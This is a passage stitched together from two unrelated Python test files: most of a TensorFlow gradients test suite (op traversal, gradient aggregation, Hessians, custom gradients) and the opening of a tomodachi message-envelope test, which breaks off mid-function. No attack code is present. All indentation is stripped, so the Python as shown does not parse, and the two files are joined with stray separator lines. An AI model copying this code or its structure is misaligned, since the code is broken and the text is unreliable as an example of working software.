self.assertEquals(self._OpNames(ops1), self._OpNames(ops2))
def testOpsBetweenSimple(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
# Full graph
self._assertOpListEqual([t3.op, t2.op, t1.op],
_OpsBetween([t3.op], [t1.op, t2.op]))
# Only t1, t3.
self._assertOpListEqual([t3.op, t1.op], _OpsBetween([t3.op], [t1.op]))
def testOpsBetweenUnreachable(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
_ = array_ops.stack([t1, t2])
t4 = constant(1.0)
t5 = constant(2.0)
t6 = array_ops.stack([t4, t5])
# Elements of to_ops are always listed.
self._assertOpListEqual([t6.op], _OpsBetween([t6.op], [t1.op]))
def testOpsBetweenCut(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = constant([1.0])
t5 = array_ops.concat([t4, t3], 0)
t6 = constant([2.0])
t7 = array_ops.concat([t5, t6], 0)
self._assertOpListEqual([t7.op, t5.op, t4.op],
_OpsBetween([t7.op], [t4.op]))
def testOpsBetweenCycle(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = array_ops.concat([t3, t3, t3], 0)
t5 = constant([1.0])
t6 = array_ops.concat([t4, t5], 0)
t7 = array_ops.concat([t6, t3], 0)
self._assertOpListEqual([t6.op, t4.op, t3.op],
_OpsBetween([t6.op], [t3.op]))
self._assertOpListEqual([t7.op, t6.op, t5.op, t4.op, t3.op, t1.op],
_OpsBetween([t7.op], [t1.op, t5.op]))
self._assertOpListEqual([t6.op, t5.op, t4.op, t3.op, t2.op],
_OpsBetween([t6.op], [t2.op, t5.op]))
def testGradients(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[32, 100], name="in")
w = constant(1.0, shape=[100, 10], name="w")
b = constant(1.0, shape=[10], name="b")
xw = math_ops.matmul(inp, w, name="xw")
h = bias_add(xw, b, name="h")
w_grad = gradients.gradients(h, w)[0]
self.assertEquals("MatMul", w_grad.op.type)
self.assertEquals(w_grad.op._original_op, xw.op)
self.assertTrue(w_grad.op.get_attr("transpose_a"))
self.assertFalse(w_grad.op.get_attr("transpose_b"))
def testUnusedOutput(self):
with ops.Graph().as_default():
w = constant(1.0, shape=[2, 2])
x = constant(1.0, shape=[2, 2])
wx = math_ops.matmul(w, x)
split_wx = array_ops.split(value=wx, num_or_size_splits=2, axis=0)
c = math_ops.reduce_sum(split_wx[1])
gw = gradients.gradients(c, [w])[0]
self.assertEquals("MatMul", gw.op.type)
def testColocateGradients(self):
with ops.Graph().as_default() as g:
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
with g.device("/device:GPU:0"):
wx = math_ops.matmul(w, x)
gw = gradients.gradients(wx, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw.op.colocation_groups(), wx.op.colocation_groups())
def testColocateGradientsWithAggregation(self):
with ops.Graph().as_default() as g:
with g.device("/device:GPU:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
wx = math_ops.matmul(w, x)
wy = math_ops.matmul(w, y)
with g.device("/device:GPU:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), wx.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(wx.op.colocation_groups() != gw2.op.colocation_groups())
def testColocateGradientsWithAggregationInMultipleDevices(self):
with ops.Graph().as_default() as g:
with g.device("/device:GPU:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
with g.device("/task:1"):
wx = math_ops.matmul(w, x)
with g.device("/task:2"):
wy = math_ops.matmul(w, y)
with g.device("/device:GPU:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), w.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(w.op.colocation_groups() != gw2.op.colocation_groups())
def testColocateGradientsWithGateGradients(self):
if not test_util.is_gpu_available():
self.skipTest("No GPU available")
with ops.Graph().as_default() as g:
with g.device("/device:CPU:0"):
x = constant(1.0, shape=[1, 1])
y = constant(1.0, shape=[1, 1])
s = x + y
with g.device("/device:GPU:0"):
z = math_ops.reduce_sum(s)
gz_x = gradients.gradients(z, [x], colocate_gradients_with_ops=True,
gate_gradients=True)[0]
with session.Session():
# Make sure the placer doesn't complain.
gz_x.eval()
def testBoundaryStop(self):
# Test that we don't differentiate 'x'. The gradient function for 'x' is
# set explicitly to None so we will get an exception if the gradient code
# tries to differentiate 'x'.
with ops.Graph().as_default():
c = constant(1.0)
x = array_ops.identity(c)
y = x + 1.0
z = y + 1
grads = gradients.gradients(z, [x])
self.assertTrue(all(x is not None for x in grads))
def testBoundaryContinue(self):
# Test that we differentiate both 'x' and 'y' correctly when x is a
# predecessor of y.
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y * 3.0
grads = gradients.gradients(z, [x, y])
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(6.0, grads[0].eval())
def testAggregationMethodAccumulateN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.
EXPERIMENTAL_ACCUMULATE_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodAddN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y], aggregation_method=gradients.AggregationMethod.ADD_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodTree(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.EXPERIMENTAL_TREE)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testNoGradientForStringOutputs(self):
with ops.Graph().as_default():
def _TestOpGrad(_, float_grad, string_grad):
"""Gradient function for TestStringOutput."""
self.assertEquals(float_grad.dtype, dtypes.float32)
self.assertFalse(string_grad)
return float_grad
ops.RegisterGradient("TestStringOutput")(_TestOpGrad)
c = constant(1.0)
x, _ = test_ops.test_string_output(c)
z = x * 2.0
w = z * 3.0
grads = gradients.gradients(z, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
grads = gradients.gradients(w, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
def testSingletonIndexedSlices(self):
with ops.Graph().as_default():
x = array_ops.placeholder(dtypes.float32)
y = array_ops.identity(x)
dy = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32))
dx, = gradients.gradients(y, x, grad_ys=dy)
# The IndexedSlices gradient of tf.identity is the identity map.
with self.test_session() as sess:
vdx, vdy = sess.run(
[dx, dy], feed_dict={x: [1.0], dy.indices: [0], dy.values: [2.0]})
self.assertEqual(vdx, vdy)
def testNonDifferentiableSwitchInWhileLoop(self):
with ops.Graph().as_default():
v = array_ops.placeholder(dtypes.float32, [])
def _Step(i, a, ta):
a += math_ops.cast(v, dtypes.int32)
return (i + 1, a, ta.write(i, a))
n = 4
i, _, ta = control_flow_ops.while_loop(
lambda i, *_: i < n,
_Step, [0, 0, tensor_array_ops.TensorArray(
dtypes.int32, size=n)])
target = ta.read(i - 1)
grad, = gradients.gradients(target, v)
self.assertIsNone(grad)
def testVariableReadValueGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var.read_value(), var)
self.assertIsNotNone(gradient)
def testVariableAsGraphElementGradient(self):
with ops.Graph().as_default() as graph:
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(graph.as_graph_element(var), var)
self.assertIsNotNone(gradient)
def testVariableRefGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var._ref(), var)
self.assertIsNotNone(gradient)
def testDependentYs(self):
with self.test_session():
x = constant_op.constant(3.0)
y = math_ops.square(x)
y1 = math_ops.square(y)
y2 = math_ops.square(y1)
g = gradients.gradients([y, y2], x)
self.assertAllClose(17502.0, g[0].eval())
g = gradients.gradients(y + y2, x)
self.assertAllClose(17502.0, g[0].eval())
z = array_ops.identity(y)
z2 = array_ops.identity(y2)
g = gradients.gradients([z, z2], x)
self.assertAllClose(17502.0, g[0].eval())
def testPartialDerivatives(self):
with self.test_session():
x = constant_op.constant(1.)
y = 2 * x
z = x + y
totalg = gradients.gradients(z, [x, y])
self.assertEqual([3.0, 1.0], [g.eval() for g in totalg])
partialg = gradients.gradients(z, [x, y], stop_gradients=[x, y])
self.assertEqual([1.0, 1.0], [g.eval() for g in partialg])
def testStopGradients(self):
def _MakeGraph(rng, stop_gradients=()):
def _FunctionOf(xs, k=3):
return ops.convert_to_tensor(
sum(math_ops.matmul(rng.rand(k, k), x) for x in xs)
+ rng.rand(k, k))
a = _FunctionOf([])
if "a" in stop_gradients: a = array_ops.stop_gradient(a)
b = _FunctionOf([a])
if "b" in stop_gradients: b = array_ops.stop_gradient(b)
c = _FunctionOf([a, b])
if "c" in stop_gradients: c = array_ops.stop_gradient(c)
d = _FunctionOf([b, c])
if "d" in stop_gradients: d = array_ops.stop_gradient(d)
return dict(a=a, b=b, c=c, d=d)
def _Gradients(ys, xs, **kwargs):
dydxs = gradients.gradients(ys, xs, **kwargs)
dydxs = [0. * x if dydx is None else dydx
for x, dydx in zip(xs, dydxs)]
return dydxs
seed = np.random.randint(1000)
cases = []
subsets = [""] + "a b c d ab ac ad bc bd cd abc abd acd bcd abcd".split()
graph = _MakeGraph(np.random.RandomState(seed))
for constants in subsets:
graph_with_stops = _MakeGraph(np.random.RandomState(seed), constants)
for variables_ in subsets:
# compute the gradient when stopped using tf.stop_gradients
grad1 = _Gradients([graph_with_stops["d"]],
[graph_with_stops[v] for v in variables_])
# compute the gradient when stopped using the stop_gradients kwarg
grad2 = _Gradients([graph["d"]],
[graph[v] for v in variables_],
stop_gradients=[graph[v] for v in constants])
cases.append(dict(grad1=grad1, grad2=grad2,
constants=constants, variables=variables_))
# evaluate all tensors in one call to session.run for speed
with self.test_session() as sess:
results = sess.run([(case["grad1"], case["grad2"]) for case in cases])
for (npgrad1, npgrad2), case in zip(results, cases):
for a, b in zip(npgrad1, npgrad2):
np.testing.assert_allclose(a, b)
class FunctionGradientsTest(test_util.TensorFlowTestCase):
@classmethod
def XSquarePlusB(cls, x, b):
return x * x + b
@classmethod
def XSquarePlusBGradient(cls, x, b, g):
# Perturb gradients (multiply by 2), so we can test that this was called.
g *= 2.0
return g * 2.0 * x, g
@classmethod
def _PythonGradient(cls, op, grad):
# Perturb gradients (multiply by 3), so we can test that this was called.
grad *= 3.0
return grad * op.inputs[0] * 2.0, grad
@classmethod
def _GetFunc(cls, **kwargs):
return function.Defun(dtypes.float32, dtypes.float32, **
kwargs)(cls.XSquarePlusB)
def _GetFuncGradients(self, f, x_value, b_value):
x = constant_op.constant(x_value, name="x")
b = constant_op.constant(b_value, name="b")
y = f(x, b)
grads = gradients.gradients(y, [x, b])
with self.test_session() as sess:
return sess.run(grads)
def testFunctionGradientsBasic(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc()
# Get gradients (should add SymbolicGradient node for function).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0], grads[0])
self.assertAllEqual([1.0], grads[1])
def testFunctionGradientsComposition(self):
with ops.Graph().as_default():
f = self._GetFunc()
x = constant_op.constant([2.0], name="x")
b1 = constant_op.constant([1.0], name="b1")
b2 = constant_op.constant([1.0], name="b2")
y = f(f(x, b1), b2)
# Build gradient graph (should add SymbolicGradient node for function).
grads = gradients.gradients(y, [x, b1])
with self.test_session() as sess:
self.assertAllEqual([40.0], sess.run(grads)[0])
self.assertAllEqual([10.0], sess.run(grads)[1])
def testFunctionGradientsWithGradFunc(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
f = self._GetFunc(grad_func=grad_func)
# Get gradients (should add SymbolicGradient node for function, which
# uses the grad_func above, which multiplies all gradients by 2).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 2], grads[0])
self.assertAllEqual([1.0 * 2], grads[1])
def testFunctionGradientWithRegistration(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc(python_grad_func=self._PythonGradient)
# Get gradients, using the python gradient function. It multiplies the
# gradients by 3.
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 3], grads[0])
self.assertAllEqual([1.0 * 3], grads[1])
def testFunctionGradientWithGradFuncAndRegistration(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
with self.assertRaisesRegexp(ValueError, "Gradient defined twice"):
f = self._GetFunc(
grad_func=grad_func, python_grad_func=self._PythonGradient)
f.add_to_graph(ops.Graph())
class StopGradientTest(test_util.TensorFlowTestCase):
def testStopGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.stop_gradient(inp)
igrad = gradients.gradients(out, inp)[0]
assert igrad is None
class PreventGradientTest(test_util.TensorFlowTestCase):
def testPreventGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.prevent_gradient(inp)
with self.assertRaisesRegexp(LookupError, "explicitly disabled"):
_ = gradients.gradients(out, inp)
class HessianVectorProductTest(test_util.TensorFlowTestCase):
def testHessianVectorProduct(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that HessianVectorProduct matches multiplication by the
# explicit Hessian.
# Specifically, the Hessian of f(x) = x^T A x is
# H = A + A^T.
# We expect HessianVectorProduct(f(x), x, v) to be H v.
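    # (Since the gradient of f(x) = x^T A x is (A + A^T) x, differentiating
    # once more gives the Hessian H = A + A^T, so the product with v should
    # equal (A + A^T) v.)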
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
v_value = rng.randn(m, 1).astype("float32")
x_value = rng.randn(m, 1).astype("float32")
hess_value = mat_value + mat_value.T
hess_v_value = np.dot(hess_value, v_value)
for use_gpu in [False, True]:
with self.test_session(use_gpu=use_gpu):
mat = constant_op.constant(mat_value)
v = constant_op.constant(v_value)
x = constant_op.constant(x_value)
mat_x = math_ops.matmul(mat, x, name="Ax")
x_mat_x = math_ops.matmul(array_ops.transpose(x), mat_x, name="xAx")
hess_v = gradients_impl._hessian_vector_product(x_mat_x, [x], [v])[0]
hess_v_actual = hess_v.eval()
self.assertAllClose(hess_v_value, hess_v_actual)
class HessianTest(test_util.TensorFlowTestCase):
def testHessian1D(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that `hessian` matches. Specifically, the Hessian of
# f(x) = x^T A x is H = A + A^T.
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
x_value = rng.randn(m).astype("float32")
hess_value = mat_value + mat_value.T
with self.test_session(use_gpu=True):
mat = constant_op.constant(mat_value)
x = constant_op.constant(x_value)
x_mat_x = math_ops.reduce_sum(x[:, None] * mat * x[None, :])
hess = gradients.hessians(x_mat_x, x)[0]
hess_actual = hess.eval()
self.assertAllClose(hess_value, hess_actual)
def testHessian1D_multi(self):
# Test the computation of the hessian with respect to multiple tensors
m = 4
n = 3
rng = np.random.RandomState([1, 2, 3])
mat_values = [rng.randn(m, m).astype("float32") for _ in range(n)]
x_values = [rng.randn(m).astype("float32") for _ in range(n)]
hess_values = [mat_value + mat_value.T for mat_value in mat_values]
with self.test_session(use_gpu=True):
mats = [constant_op.constant(mat_value) for mat_value in mat_values]
xs = [constant_op.constant(x_value) for x_value in x_values]
xs_mats_xs = [
math_ops.reduce_sum(x[:, None] * mat * x[None, :])
for x, mat in zip(xs, mats)
]
hessians = gradients.hessians(xs_mats_xs, xs)
hessians_actual = [hess.eval() for hess in hessians]
for hess_value, hess_actual in zip(hess_values, hessians_actual):
self.assertAllClose(hess_value, hess_actual)
def testHessianInvalidDimension(self):
for shape in [(10, 10), None]:
with self.test_session(use_gpu=True):
x = array_ops.placeholder(dtypes.float32, shape)
# Expect a ValueError because the dimensions are wrong
with self.assertRaises(ValueError):
gradients.hessians(x, x)
def testHessian2D_square_matrix(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that `hessian` matches. Specifically, the Hessian of
# f(x) = 1/2 * x^T * x is H = constant (block identity matrix)
m = 3
rng = np.random.RandomState([1, 2, 3])
x_value = rng.randn(m, m).astype("float32")
with self.test_session(use_gpu=True):
x = constant_op.constant(x_value)
x_square = math_ops.reduce_sum(
math_ops.matmul(array_ops.transpose(x), x) * 0.5
)
hess = gradients.hessians(x_square, x)[0]
hess_actual = hess.eval()
hess_value = np.bmat([
[elem*np.ones((m, m)) for elem in vec]
for vec in np.eye(m)
]).astype("float32")
self.assertAllEqual((m, m, m, m), hess_actual.shape)
self.assertAllClose(hess_value, hess_actual.reshape((m * m, m * m)))
def testHessian2D_non_square_matrix(self):
m = 3
n = 4
rng = np.random.RandomState([1, 2, 3])
x_value = rng.randn(m, n).astype("float32")
with self.test_session(use_gpu=True):
x = constant_op.constant(x_value)
x_square = math_ops.reduce_sum(
math_ops.matmul(array_ops.transpose(x), x) * 0.5
)
hess = gradients.hessians(x_square, x)[0]
hess_actual = hess.eval()
hess_value = np.bmat([
[elem*np.ones((n, n)) for elem in vec]
for vec in np.eye(m)
]).astype("float32")
self.assertAllEqual((m, n, m, n), hess_actual.shape)
self.assertAllClose(hess_value, hess_actual.reshape((m * n, m * n)))
class IndexedSlicesToTensorTest(test_util.TensorFlowTestCase):
def testIndexedSlicesToTensor(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testIndexedSlicesToTensorList(self):
with self.test_session():
numpy_list = []
dense_list = []
sparse_list = []
for _ in range(3):
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
numpy_list.append(np_val)
dense_list.append(c)
sparse_list.append(c_sparse)
packed_dense = array_ops.stack(dense_list)
packed_sparse = array_ops.stack(sparse_list)
self.assertAllClose(packed_dense.eval(), packed_sparse.eval())
def testInt64Indices(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
c_sparse = ops.IndexedSlices(
c_sparse.values,
math_ops.cast(c_sparse.indices, dtypes.int64), c_sparse.dense_shape)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testWarnings(self):
# TODO(gunan) Reenable after this issue is fixed:
# https://github.com/google/protobuf/issues/2812
if sys.version_info >= (3, 5):
self.skipTest("Skipped test for Python 3.5+")
# Smaller than the threshold: no warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([4, 4, 4, 4]))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(0, len(w))
# Greater than or equal to the threshold: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([100, 100, 100, 100]))
# "always" filter prevents the warning from being suppressed if it was
# already triggered in a different test.
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"with 100000000 elements. This may consume a large amount of memory." in
str(w[0].message))
# Unknown dense shape: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32),
array_ops.placeholder(dtypes.int32))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"of unknown shape. This may consume a large amount of memory." in
str(w[0].message))
class OnlyRealGradientsTest(test_util.TensorFlowTestCase):
def testRealOnly(self):
x = constant_op.constant(7+3j, dtype=dtypes.complex64)
y = math_ops.square(x)
with self.assertRaisesRegexp(
TypeError,
r"Gradients of complex tensors must set grad_ys "
r"\(y\.dtype = tf\.complex64\)"):
gradients.gradients(y, x)
class ResourceCondTest(test_util.TensorFlowTestCase):
def testBasic(self):
gamma = resource_variable_ops.ResourceVariable(
np.random.random((3,)),
dtype="float32", name="gamma")
inputs = array_ops.ones(shape=(3,), dtype="float32")
def TestFn():
output = inputs + gamma
return output
training = array_ops.placeholder_with_default(True, shape=())
output = control_flow_ops.cond(
training, TestFn, lambda: inputs)
loss = output
grads = gradients.gradients(
loss, [gamma])
self.assertTrue(None not in grads)
class CustomGradientTest(test_util.TensorFlowTestCase):
def testCustomGradientTrivial(self):
@custom_gradient.custom_gradient
def MyIdentity(x):
def Grad(dy):
return [3 * dy]
return x, Grad
with ops.Graph().as_default():
x = constant(3.)
y = MyIdentity(MyIdentity(x))
dy = gradients.gradients(y, x)[0]
with session.Session():
self.assertEqual(9., dy.eval())
def testCustomGradient(self):
@custom_gradient.custom_gradient
def MyMultiply(x1, x2):
result = x1 * x2
def Grad(dy):
# Switched the ordering here.
return [dy * x1, dy * x2]
return result, Grad
with ops.Graph().as_default():
x1 = constant(3.)
x2 = constant(5.)
y = MyMultiply(x1, x2)
dy = gradients.gradients(y, [x1, x2])
with session.Session() as sess:
self.assertAllEqual([3., 5.], sess.run(dy))
def testCustomGradientErrors(self):
@custom_gradient.custom_gradient
def F(x):
def Grad(_):
raise RuntimeError("x")
return x, Grad
with ops.Graph().as_default():
x = constant(1.0)
y = F(x)
with self.assertRaises(RuntimeError):
gradients.gradients(y, x)
def testCustomGradientWithVariables(self):
@custom_gradient.custom_gradient
def F(x):
out = core_layers.dense(x, 3, use_bias=False)
def Grad(out_grad, variables=None): # pylint: disable=redefined-outer-name
self.assertEqual(1, len(variables))
grads = gradients.gradients(out, [x, variables[0]], grad_ys=out_grad)
return grads[0], [array_ops.ones((4, 3))]
return out, Grad
with ops.Graph().as_default():
x = array_ops.ones((2, 4))
with variable_scope.variable_scope("f", use_resource=True) as vs:
y = F(x)
all_vars = vs.global_variables()
assert len(all_vars) == 1
grads = gradients.gradients(y, [x, all_vars[0]])
for g in grads:
self.assertTrue(g is not None)
with session.Session() as sess:
sess.run(variables.global_variables_initializer())
dw = sess.run(math_ops.reduce_sum(grads[1]))
self.assertEqual(12., dw)
def testCustomGradientWithVariablesEager(self):
with context.eager_mode():
layer = core_layers.Dense(4, use_bias=False)
@custom_gradient.custom_gradient
def F(x):
out = layer(x)
def Grad(out_grad, variables=None): # pylint: disable=redefined-outer-name
del out_grad
self.assertEqual(1, len(variables))
return (array_ops.ones((3, 2)),
[array_ops.ones((2, 4))])
return out, Grad
x = array_ops.ones((3, 2)) + 2.
with backprop.GradientTape() as tape:
tape.watch(x)
y = F(x)
w, = layer.variables
dx, dw = tape.gradient(y, [x, w])
self.assertEqual(6., math_ops.reduce_sum(dx).numpy())
self.assertEqual(8., math_ops.reduce_sum(dw).numpy())
def testCustomGradientErrorsWithNonResourceVariables(self):
def F(x, use_resource=False):
with variable_scope.variable_scope("f", use_resource=use_resource):
out = core_layers.dense(x, 4, use_bias=False)
def Grad(out_grad, variables=None): # pylint: disable=redefined-outer-name
del out_grad
self.assertEqual(1, len(variables))
return (array_ops.ones((3, 2)), [array_ops.ones((2, 4))])
return out, Grad
@custom_gradient.custom_gradient
def FResource(x):
return F(x, use_resource=True)
@custom_gradient.custom_gradient
def FNonResource(x):
return F(x, use_resource=False)
x = array_ops.ones((3, 2)) + 2.
# Wrapping scope has use_resource=True but inner scope sets to False. Fails.
with variable_scope.variable_scope("vs1", use_resource=True):
with self.assertRaisesWithPredicateMatch(TypeError,
"must be `ResourceVariable`s"):
FNonResource(x)
# Wrapping scope has use_resource=False but inner scope sets to True.
# Passes.
with variable_scope.variable_scope("vs2", use_resource=False):
FResource(x)
def testWithNumpyInputs(self):
with context.eager_mode():
@custom_gradient.custom_gradient
def F(x):
out = x
def Grad(_):
return (None, None)
return out, Grad
x = np.ones((3, 2), dtype=np.float32)
# Smoke test to ensure numpy inputs are accepted
F(x)
def testRVGradientsDynamicCond(self):
with self.test_session():
alpha = resource_variable_ops.ResourceVariable(
np.random.random((1,)),
dtype="float32")
conditional = array_ops.placeholder_with_default(True, shape=())
output = control_flow_ops.cond(
conditional, lambda: alpha * 2, lambda: alpha * 3)
g, = gradients_impl.gradients(output, alpha)
variables.global_variables_initializer().run()
self.assertAllEqual(g.eval(), [2.0])
self.assertAllEqual(g.eval(feed_dict={conditional: False}), [3.0])
class AggregateIndexedSlicesGradientsTest(test_util.TensorFlowTestCase):
def _assert_indexed_slices_equal(self, left, right):
self.assertAllEqual(
self.evaluate(ops.convert_to_tensor(left)),
self.evaluate(ops.convert_to_tensor(right)))
def testNoGradients(self):
self.assertIsNone(gradients_impl._AggregateIndexedSlicesGradients([]))
def testOneGradient(self):
t = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
result = gradients_impl._AggregateIndexedSlicesGradients([t])
self._assert_indexed_slices_equal(t, result)
def testMultipleGradients(self):
t0 = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
t1 = math_ops._as_indexed_slices(constant_op.constant(
[[0., 0.], [5, 6], [7., 8.]]))
total = constant_op.constant(
[[1., 2.], [5, 6], [10., 12.]])
result = gradients_impl._AggregateIndexedSlicesGradients([t0, t1])
self._assert_indexed_slices_equal(total, result)
def testMultipleGradientsWithNones(self):
t0 = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
t1 = math_ops._as_indexed_slices(constant_op.constant(
[[0., 0.], [5, 6], [7., 8.]]))
t3 = None
total = constant_op.constant(
[[1., 2.], [5, 6], [10., 12.]])
result = gradients_impl._AggregateIndexedSlicesGradients([t0, t1, t3])
self._assert_indexed_slices_equal(total, result)
def testMixedTensorAndIndexedSlices(self):
t0 = math_ops._as_indexed_slices(constant_op.constant(
[[1., 2.], [0, 0], [3., 4.]]))
t1 = constant_op.constant(
[[0., 0.], [5, 6], [7., 8.]])
total = constant_op.constant(
[[1., 2.], [5, 6], [10., 12.]])
result = gradients_impl._AggregateIndexedSlicesGradients([t0, t1])
self._assert_indexed_slices_equal(total, result)
if __name__ == "__main__":
googletest.main()
|
|
import json
import os
import signal
import time
from typing import Any
import pytest
from google.protobuf.json_format import MessageToJson
from proto_build.message_pb2 import Person
from run_test_service_helper import start_service
from tomodachi.envelope.proto_build.protobuf.sns_sqs_message_pb2 import SNSSQSMessage # noqa
from tomodachi.validation.validation import RegexMissmatchException, validate_field_regex
def test_json_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = {"key": "value"}
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "raw"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_json_base_large_message(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = ["item {}".format(i) for i in range(1, 10000)]
assert len(json.dumps(data)) > 60000
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
assert len(json.dumps(json_message)) < 60000
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("metadata", {}).get("data_encoding") == "base64_gzip_json"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
t1 = time.time()
